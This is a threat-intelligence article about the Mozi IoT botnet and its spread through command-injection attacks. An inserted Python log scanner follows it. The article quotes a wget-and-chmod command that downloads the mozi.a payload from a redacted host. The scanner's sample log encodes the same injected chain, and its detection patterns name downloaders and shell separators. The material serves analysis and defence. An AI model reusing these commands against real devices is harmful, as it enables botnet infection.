A New Botnet Attack Just Mozied Into Town

A relatively new player in the threat arena, the Mozi botnet, has spiked among Internet of things (IoT) devices, IBM X-Force has discovered.

This malware has been active since late 2019 and has code overlap with Mirai and its variants. Mozi accounted for nearly 90% of the observed IoT network traffic from October 2019 through June 2020.

This startling takeover was accompanied by a huge increase in overall IoT botnet activity, suggesting Mozi did not remove competitors from the market. Rather, it flooded the market, dwarfing other variants’ activity. Overall, combined IoT attack instances from October 2019, when attacks began to notably increase, through June 2020 are 400% higher than the combined IoT attack instances for the previous two years.

This surge in IoT attacks could be due to a number of causes, but may in part result from an ever-expanding IoT landscape for threat actors to target. There are about 31 billion IoT devices deployed around the globe, and the IoT deployment rate is now 127 devices per second.

Attackers have been leveraging these devices for some time now, most notably via the Mirai botnet, which the IBM X-Force Incident Response and Intelligence Services (IRIS) team has been following for nearly four years. So why the sudden jump? IBM research suggests Mozi continues to be successful largely through the use of command injection (CMDi) attacks, which often result from the misconfiguration of IoT devices. The continued growth of IoT usage and poor configuration practices are the likely culprits behind this jump. This increase may have been fueled further by corporate networks being accessed remotely more often due to COVID-19.

IoT Devices Are Everywhere

An IoT botnet can be used to perform distributed denial-of-service (DDoS) attacks, steal data and send spam. There are a plethora of different types of IoT devices to exploit:

  • Consumer IoT: Home-based devices, such as security cameras, lighting control, appliances, etc.
  • Commercial IoT: Devices designed for use in various industries. For instance, healthcare has internet-connected pacemakers and monitors. The transportation and construction industries use devices associated with vehicle trackers, telematics, logistic and supply chain systems and building information modeling.
  • Enterprise IoT: Devices designed for use in offices, such as projectors, routers, security systems and digital advertising.
  • The Industrial IoT: Industrial control systems, production line automation systems, logic controllers and aircraft systems.
  • Infrastructure IoT: Smart city management systems, traffic control devices, utility monitoring devices, etc.
  • Internet of Military Things: Wearable combat biometrics devices, robots and surveillance equipment.

This large attack surface leaves organizations vulnerable to IoT botnets. Couple that with the security holes these devices often have out of the box and the lax hardening practices applied at deployment, and the exposure grows further. The most notable vulnerability in the IoT comes via CMDi attacks.

CMDi Attacks Deliver Mozi Botnet

Nearly all IBM-observed IoT targeting attempted to use CMDi attacks to gain initial access to the device. If the targeted endpoint was an IoT device susceptible to these attacks, the payload was downloaded and executed.

CMDi attacks are extremely popular against IoT devices for several reasons. First, IoT embedded systems commonly contain a web interface and a debugging interface left over from firmware development that can be exploited. Second, PHP modules built into IoT web interfaces can be exploited to give malicious actors remote execution capability. And third, IoT interfaces often are left vulnerable when deployed because administrators fail to harden the interfaces by sanitizing expected remote input. This allows threat actors to input shell commands such as “wget”.

Our analysis revealed the Mozi botnet leverages CMDi by using a “wget” shell command, then altering permissions to allow the threat actor to interact with the affected system. For example:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

If the host was vulnerable to CMDi, this command would download and execute a file called “mozi.a”. Our analysis of this particular sample indicates the file is built for the microprocessor without interlocked pipelined stages (MIPS) architecture, a reduced instruction set computer (RISC) architecture that is prevalent on many IoT devices. Once the attacker gains full access to the device through the botnet, the firmware level can be changed and additional malware can be planted on the device.
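As an added example (not code from the article or from IBM), the following check scans constructed web-interface access-log lines for the injected wget/chmod chain described above. The device path, parameter name and IP addresses are placeholders.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines from a hypothetical IoT device web interface; addresses are
# documentation ranges (RFC 5737) and the injected command mirrors the chain in the article.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Jul/2020:10:01:03 +0000] "GET /cgi-bin/diag.cgi?host=192.168.1.1 HTTP/1.1" 200 512
203.0.113.10 - - [12/Jul/2020:10:01:09 +0000] "GET /cgi-bin/diag.cgi?host=192.168.1.1%3Bwget+http%3A%2F%2F198.51.100.7%2Fbins%2Fmozi.a+-o+%2Fvar%2Ftmp%2Fmozi.a%3B+chmod+777+%2Fvar%2Ftmp%2Fmozi.a HTTP/1.1" 200 512
198.51.100.7 - - [12/Jul/2020:10:02:00 +0000] "GET /cgi-bin/diag.cgi?host=10.0.0.5%7Cid HTTP/1.1" 200 64
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)')
INDICATORS = {
    # Shell metacharacters that let a second command ride along with the expected input.
    'shell_separator': re.compile(r'[;|&`]|\$\('),
    'downloader': re.compile(r'\b(wget|curl|tftp|ftpget)\b', re.I),
    'chmod': re.compile(r'\bchmod\s+(?:[0-7]{3,4}|\+x)\b'),
}

def decode_target(target):
    """URL-decode repeatedly so double-encoding cannot hide the payload from the regexes."""
    prev = None
    for _ in range(3):
        if target == prev:
            break
        prev, target = target, unquote_plus(target)
    return target

def classify(line):
    """Return an alert dict for one log line, or None if the query string looks benign."""
    m = LOG_RE.match(line)
    if not m or '?' not in m.group('target'):
        return None
    query = decode_target(m.group('target').split('?', 1)[1])
    indicators = [name for name, rx in INDICATORS.items() if rx.search(query)]
    if not indicators:
        return None
    if 'downloader' in indicators and 'chmod' in indicators:
        verdict = 'download-and-chmod chain'
    elif 'shell_separator' in indicators:
        verdict = 'possible command injection'
    else:
        verdict = 'downloader name in parameter'
    return {'ip': m.group('ip'), 'ts': m.group('ts'), 'verdict': verdict,
            'indicators': indicators, 'query': query}

def scan(log_text):
    """Run classify over every line and return the alerts in log order."""
    return [a for a in (classify(l) for l in log_text.splitlines()) if a]
```

Running scan(SAMPLE_LOG) flags the second line as a download-and-chmod chain and the third as a possible injection, while the benign first request produces no alert.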

Although this example cites a well-known vector, it can continue to be effective for two main reasons. First, newly disclosed vulnerabilities allow exploitation attempts via CMDi to be updated constantly, and slow patch implementation leaves devices exposed. Second, this activity is easily automated, allowing threat actors to hit a broad swath of devices quickly at low cost.

The Mozi botnet infrastructure appears primarily sourced in China, accounting for 84% of observed infrastructure. This fact aligns with other open-source research into IoT activity in 2020.